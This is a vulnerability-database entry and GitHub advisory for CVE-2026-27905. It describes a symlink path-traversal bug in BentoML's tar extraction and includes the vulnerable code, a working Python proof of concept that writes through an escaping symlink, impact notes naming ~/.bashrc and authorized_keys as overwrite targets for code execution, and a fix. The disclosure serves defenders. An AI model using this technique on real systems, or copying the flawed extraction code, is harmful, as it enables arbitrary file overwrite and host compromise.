CVE-2026-27905 (GCVE-0-2026-27905)

Vulnerability from cvelistv5 – Published: 2026-03-03 22:45 – Updated: 2026-03-03 22:45

Title

BentoML has an Arbitrary File Write via Symlink Path Traversal in Tar Extraction

Summary

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.36, the safe_extract_tarfile() function validates that each tar member's path is within the destination directory, but for symlink members it only validates the symlink's own path, not the symlink's target. An attacker can create a malicious bento/model tar file containing a symlink pointing outside the extraction directory, followed by a regular file that writes through the symlink, achieving arbitrary file write on the host filesystem. This vulnerability is fixed in 1.4.36.

Severity ?

8.6 (High)


                        
                          CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE

CWE-59 - Improper Link Resolution Before File Access ('Link Following')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/bentoml/BentoML/security/advis…	x_refsource_CONFIRM
	https://github.com/bentoml/BentoML/commit/4e0eb00…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	bentoml	BentoML	Affected: < 1.4.36

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "BentoML",
          "vendor": "bentoml",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.4.36"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.36, the safe_extract_tarfile() function validates that each tar member\u0027s path is within the destination directory, but for symlink members it only validates the symlink\u0027s own path, not the symlink\u0027s target. An attacker can create a malicious bento/model tar file containing a symlink pointing outside the extraction directory, followed by a regular file that writes through the symlink, achieving arbitrary file write on the host filesystem. This vulnerability is fixed in 1.4.36."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "LOCAL",
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-59",
              "description": "CWE-59: Improper Link Resolution Before File Access (\u0027Link Following\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-03T22:45:40.434Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/bentoml/BentoML/security/advisories/GHSA-m6w7-qv66-g3mf",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-m6w7-qv66-g3mf"
        },
        {
          "name": "https://github.com/bentoml/BentoML/commit/4e0eb007765ac04c7924220d643f264715cc9670",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/bentoml/BentoML/commit/4e0eb007765ac04c7924220d643f264715cc9670"
        }
      ],
      "source": {
        "advisory": "GHSA-m6w7-qv66-g3mf",
        "discovery": "UNKNOWN"
      },
      "title": "BentoML has an Arbitrary File Write via Symlink Path Traversal in Tar Extraction"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-27905",
    "datePublished": "2026-03-03T22:45:40.434Z",
    "dateReserved": "2026-02-24T15:19:29.718Z",
    "dateUpdated": "2026-03-03T22:45:40.434Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-27905\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-03T23:15:55.897\",\"lastModified\":\"2026-03-03T23:15:55.897\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.36, the safe_extract_tarfile() function validates that each tar member\u0027s path is within the destination directory, but for symlink members it only validates the symlink\u0027s own path, not the symlink\u0027s target. An attacker can create a malicious bento/model tar file containing a symlink pointing outside the extraction directory, followed by a regular file that writes through the symlink, achieving arbitrary file write on the host filesystem. This vulnerability is fixed in 1.4.36.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.6,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-59\"}]}],\"references\":[{\"url\":\"https://github.com/bentoml/BentoML/commit/4e0eb007765ac04c7924220d643f264715cc9670\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/bentoml/BentoML/security/advisories/GHSA-m6w7-qv66-g3mf\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

GHSA-M6W7-QV66-G3MF

Vulnerability from github – Published: 2026-03-03 17:46 – Updated: 2026-03-04 02:00

Summary

BentoML Vulnerable to Arbitrary File Write via Symlink Path Traversal in Tar Extraction

Details

Arbitrary File Write via Symlink Path Traversal in Tar Extraction

Summary

The safe_extract_tarfile() function validates that each tar member's path is within the destination directory, but for symlink members it only validates the symlink's own path, not the symlink's target. An attacker can create a malicious bento/model tar file containing a symlink pointing outside the extraction directory, followed by a regular file that writes through the symlink, achieving arbitrary file write on the host filesystem.

Affected Component

File: src/bentoml/_internal/utils/filesystem.py:58-96
Callers: src/bentoml/_internal/cloud/bento.py:542, src/bentoml/_internal/cloud/model.py:504
Affected versions: All versions with safe_extract_tarfile()

Severity

CVSS 3.1: 8.1 (High) AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Vulnerability Details

Vulnerable Code (filesystem.py:58-96)

def safe_extract_tarfile(tar, destination):
    os.makedirs(destination, exist_ok=True)
    for member in tar.getmembers():
        fn = member.name
        path = os.path.abspath(os.path.join(destination, fn))
        if not Path(path).is_relative_to(destination):  # Line 64: INCOMPLETE
            continue  # Only checks member path, NOT symlink target
        if member.issym():
            tar._extract_member(member, path)  # Line 75: Creates symlink with UNVALIDATED target
        else:
            fp = tar.extractfile(member)
            with open(path, "wb") as destfp:  # Line 92: open() FOLLOWS symlinks
                shutil.copyfileobj(fp, destfp)

The Bug

Line 64: Path(path).is_relative_to(destination) checks the member's OWN path, not the symlink target
Line 75: tar._extract_member() creates symlink with unvalidated target (e.g., /etc)
Line 92: open(path, "wb") follows the symlink, writing OUTSIDE the destination

os.path.abspath() does NOT resolve symlinks (only . and ..). The path check passes because the string path appears within destination, but open() follows the symlink to the actual target.

Proof of Concept

import io, os, shutil, tarfile, tempfile
from pathlib import Path

def create_malicious_tar(target_dir, target_file, payload):
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode='w:gz') as tar:
        sym = tarfile.TarInfo(name='escape')
        sym.type = tarfile.SYMTYPE
        sym.linkname = target_dir
        tar.addfile(sym)
        info = tarfile.TarInfo(name=f'escape/{target_file}')
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    buf.seek(0)
    return buf

with tempfile.TemporaryDirectory() as tmpdir:
    extract_dir = os.path.join(tmpdir, 'extract')
    target_dir = os.path.join(tmpdir, 'outside')
    os.makedirs(target_dir)

    mal_tar = create_malicious_tar(target_dir, 'pwned.txt', b'PWNED')
    tar = tarfile.open(fileobj=mal_tar, mode='r:gz')

    # Reproduce filesystem.py:58-96
    os.makedirs(extract_dir, exist_ok=True)
    for member in tar.getmembers():
        path = os.path.abspath(os.path.join(extract_dir, member.name))
        if not Path(path).is_relative_to(extract_dir): continue
        if member.issym():
            tar._extract_member(member, path)  # Symlink target NOT checked
        else:
            fp = tar.extractfile(member)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            if fp:
                with open(path, 'wb') as destfp:  # Follows symlink!
                    shutil.copyfileobj(fp, destfp)

    assert os.path.exists(os.path.join(target_dir, 'pwned.txt'))
    print(open(os.path.join(target_dir, 'pwned.txt')).read())  # PWNED

Impact

1. Arbitrary file overwrite via shared bentos

BentoML users share pre-built bentos. A malicious bento can overwrite any writable file: ~/.bashrc, ~/.ssh/authorized_keys, crontabs, Python site-packages.

2. Remote code execution via file overwrite

Overwriting ~/.bashrc or Python packages achieves RCE.

3. BentoCloud deployments

safe_extract_tarfile() is called when pulling bentos from BentoCloud (bento.py:542). A malicious actor on BentoCloud can compromise any system that pulls a bento.

Remediation

Validate symlink targets:

if member.issym():
    target = os.path.normpath(os.path.join(os.path.dirname(path), member.linkname))
    if not Path(target).is_relative_to(dest):
        logger.warning('Symlink %s points outside: %s', member.name, member.linkname)
        continue

Or use Python 3.12+ tar.extractall(filter='data').

References

CWE-59: Improper Link Resolution Before File Access ('Link Following')
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Severity ?

8.6 (High)


                  
                    CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "bentoml"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.36"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27905"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-03T17:46:47Z",
    "nvd_published_at": "2026-03-03T23:15:55Z",
    "severity": "HIGH"
  },
  "details": "# Arbitrary File Write via Symlink Path Traversal in Tar Extraction\n\n## Summary\n\nThe `safe_extract_tarfile()` function validates that each tar member\u0027s path is within the destination directory, but for symlink members it only validates the symlink\u0027s own path, **not the symlink\u0027s target**. An attacker can create a malicious bento/model tar file containing a symlink pointing outside the extraction directory, followed by a regular file that writes through the symlink, achieving arbitrary file write on the host filesystem.\n\n## Affected Component\n\n- **File**: `src/bentoml/_internal/utils/filesystem.py:58-96`\n- **Callers**: `src/bentoml/_internal/cloud/bento.py:542`, `src/bentoml/_internal/cloud/model.py:504`\n- **Affected versions**: All versions with `safe_extract_tarfile()`\n\n## Severity\n\n**CVSS 3.1: 8.1 (High)**\n`AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H`\n\n## Vulnerability Details\n\n### Vulnerable Code (filesystem.py:58-96)\n\n```python\ndef safe_extract_tarfile(tar, destination):\n    os.makedirs(destination, exist_ok=True)\n    for member in tar.getmembers():\n        fn = member.name\n        path = os.path.abspath(os.path.join(destination, fn))\n        if not Path(path).is_relative_to(destination):  # Line 64: INCOMPLETE\n            continue  # Only checks member path, NOT symlink target\n        if member.issym():\n            tar._extract_member(member, path)  # Line 75: Creates symlink with UNVALIDATED target\n        else:\n            fp = tar.extractfile(member)\n            with open(path, \"wb\") as destfp:  # Line 92: open() FOLLOWS symlinks\n                shutil.copyfileobj(fp, destfp)\n```\n\n### The Bug\n\n1. Line 64: `Path(path).is_relative_to(destination)` checks the member\u0027s OWN path, not the symlink target\n2. Line 75: `tar._extract_member()` creates symlink with unvalidated target (e.g., `/etc`)\n3. Line 92: `open(path, \"wb\")` follows the symlink, writing OUTSIDE the destination\n\n`os.path.abspath()` does NOT resolve symlinks (only `.` and `..`). The path check passes because the string path appears within destination, but `open()` follows the symlink to the actual target.\n\n## Proof of Concept\n\n```python\nimport io, os, shutil, tarfile, tempfile\nfrom pathlib import Path\n\ndef create_malicious_tar(target_dir, target_file, payload):\n    buf = io.BytesIO()\n    with tarfile.open(fileobj=buf, mode=\u0027w:gz\u0027) as tar:\n        sym = tarfile.TarInfo(name=\u0027escape\u0027)\n        sym.type = tarfile.SYMTYPE\n        sym.linkname = target_dir\n        tar.addfile(sym)\n        info = tarfile.TarInfo(name=f\u0027escape/{target_file}\u0027)\n        info.size = len(payload)\n        tar.addfile(info, io.BytesIO(payload))\n    buf.seek(0)\n    return buf\n\nwith tempfile.TemporaryDirectory() as tmpdir:\n    extract_dir = os.path.join(tmpdir, \u0027extract\u0027)\n    target_dir = os.path.join(tmpdir, \u0027outside\u0027)\n    os.makedirs(target_dir)\n    \n    mal_tar = create_malicious_tar(target_dir, \u0027pwned.txt\u0027, b\u0027PWNED\u0027)\n    tar = tarfile.open(fileobj=mal_tar, mode=\u0027r:gz\u0027)\n    \n    # Reproduce filesystem.py:58-96\n    os.makedirs(extract_dir, exist_ok=True)\n    for member in tar.getmembers():\n        path = os.path.abspath(os.path.join(extract_dir, member.name))\n        if not Path(path).is_relative_to(extract_dir): continue\n        if member.issym():\n            tar._extract_member(member, path)  # Symlink target NOT checked\n        else:\n            fp = tar.extractfile(member)\n            os.makedirs(os.path.dirname(path), exist_ok=True)\n            if fp:\n                with open(path, \u0027wb\u0027) as destfp:  # Follows symlink!\n                    shutil.copyfileobj(fp, destfp)\n    \n    assert os.path.exists(os.path.join(target_dir, \u0027pwned.txt\u0027))\n    print(open(os.path.join(target_dir, \u0027pwned.txt\u0027)).read())  # PWNED\n```\n\n## Impact\n\n### 1. Arbitrary file overwrite via shared bentos\nBentoML users share pre-built bentos. A malicious bento can overwrite any writable file: `~/.bashrc`, `~/.ssh/authorized_keys`, crontabs, Python site-packages.\n\n### 2. Remote code execution via file overwrite\nOverwriting `~/.bashrc` or Python packages achieves RCE.\n\n### 3. BentoCloud deployments\n`safe_extract_tarfile()` is called when pulling bentos from BentoCloud (bento.py:542). A malicious actor on BentoCloud can compromise any system that pulls a bento.\n\n## Remediation\n\nValidate symlink targets:\n```python\nif member.issym():\n    target = os.path.normpath(os.path.join(os.path.dirname(path), member.linkname))\n    if not Path(target).is_relative_to(dest):\n        logger.warning(\u0027Symlink %s points outside: %s\u0027, member.name, member.linkname)\n        continue\n```\n\nOr use Python 3.12+ `tar.extractall(filter=\u0027data\u0027)`.\n\n## References\n\n- CWE-59: Improper Link Resolution Before File Access (\u0027Link Following\u0027)\n- CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
  "id": "GHSA-m6w7-qv66-g3mf",
  "modified": "2026-03-04T02:00:42Z",
  "published": "2026-03-03T17:46:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-m6w7-qv66-g3mf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27905"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bentoml/BentoML/commit/4e0eb007765ac04c7924220d643f264715cc9670"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/bentoml/BentoML"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "BentoML Vulnerable to Arbitrary File Write via Symlink Path Traversal in Tar Extraction"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-27905 (GCVE-0-2026-27905)

GHSA-M6W7-QV66-G3MF

Arbitrary File Write via Symlink Path Traversal in Tar Extraction

Summary

Affected Component

Severity

Vulnerability Details

Vulnerable Code (filesystem.py:58-96)

The Bug

Proof of Concept

Impact

1. Arbitrary file overwrite via shared bentos

2. Remote code execution via file overwrite

3. BentoCloud deployments

Remediation

References

Tags

Sightings

Nomenclature